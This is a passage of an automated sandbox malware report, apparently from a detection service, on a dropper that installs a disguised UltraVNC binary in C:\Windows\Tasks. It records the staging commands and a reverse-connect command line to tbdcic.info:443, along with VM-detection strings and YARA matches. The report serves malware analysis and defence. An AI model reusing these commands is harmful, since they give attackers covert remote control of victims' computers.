                          Source: C:\Windows\Tasks\sync_browser.exeCode function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,26_2_00007FF7E5079D00
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 433Jump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeWindow / User API: threadDelayed 1352
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 363
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 365
                          Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 362
                          Source: C:\Windows\Tasks\sync_browser.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_23-22293
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\sdABZ4.E1924RJump to dropped file
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924RJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\Tasks\conhost.exeJump to dropped file
                          Source: C:\Windows\Tasks\sync_browser.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-22671
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 3.5 %
                          Source: C:\Windows\Tasks\sync_browser.exeAPI coverage: 1.2 %
                          Source: C:\Windows\Tasks\sync_browser.exe TID: 1056Thread sleep time: -135200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 3920Thread sleep count: 61 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 336Thread sleep count: 33 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7484Thread sleep count: 363 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7484Thread sleep time: -36300s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7312Thread sleep count: 365 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 7312Thread sleep time: -36500s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4816Thread sleep count: 362 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 4816Thread sleep time: -36200s >= -30000s
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6560Thread sleep count: 317 > 30
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6560Thread sleep time: -31700s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Tasks\sync_browser.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,26_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5075910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,26_2_00007FF7E5075910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E512A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,26_2_00007FF7E512A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E509C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,26_2_00007FF7E509C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5096DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF7E5096DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5076060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,23_2_00007FF7E5076060
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pSST Authoty\NetLocalSystemHyper-V Guest Service Interface
                          Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k ICService -pCSSLaLocalSystemionHyper-V Remote Desktop Virtualization Serviceration
                          Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k ICService -pLocalSystemHyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Data Exchange Service
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 00000017.00000002.3170525650.0000000002CB6000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 00000017.00000002.3170134622.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 0000001A.00000002.1499873196.000000000140B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct Servicek,_
                          Source: sync_browser.exe, 0000001A.00000002.1500112445.0000000003266000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service Interface
                          Source: sync_browser.exe, 0000001A.00000002.1499997425.00000000017D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end nodegraph_23-21965
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF7E51347E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50826B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,23_2_00007FF7E50826B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50D9BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,23_2_00007FF7E50D9BC0
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF7E51347E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5127220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF7E5127220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E51347E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF7E51347E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7E5127220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF7E5127220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe26_2_00007FF7E50D9BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5083E20 GetVersionExA,GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,23_2_00007FF7E5083E20
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50874C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF7E50874C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5094D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,23_2_00007FF7E5094D7E
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmdJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E5087B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,23_2_00007FF7E5087B90
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.drBinary or memory string: Program Manager
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.drBinary or memory string: Shell_TrayWnd
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.drBinary or memory string: Progman
                          Source: Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E50D9EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,23_2_00007FF7E50D9EF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF7E512DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_00007FF7E512DF80
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                          Stealing of Sensitive Information

                          barindex
                          Yara detected UltraVNC Hacktool
                          Source: Yara matchFile source: 26.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Olz7TmvkEW.exe PID: 1240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 2044, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 1840, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected UltraVNC Hacktool
                          Source: Yara matchFile source: 26.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff7e5070000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.1496705820.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.1422085476.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
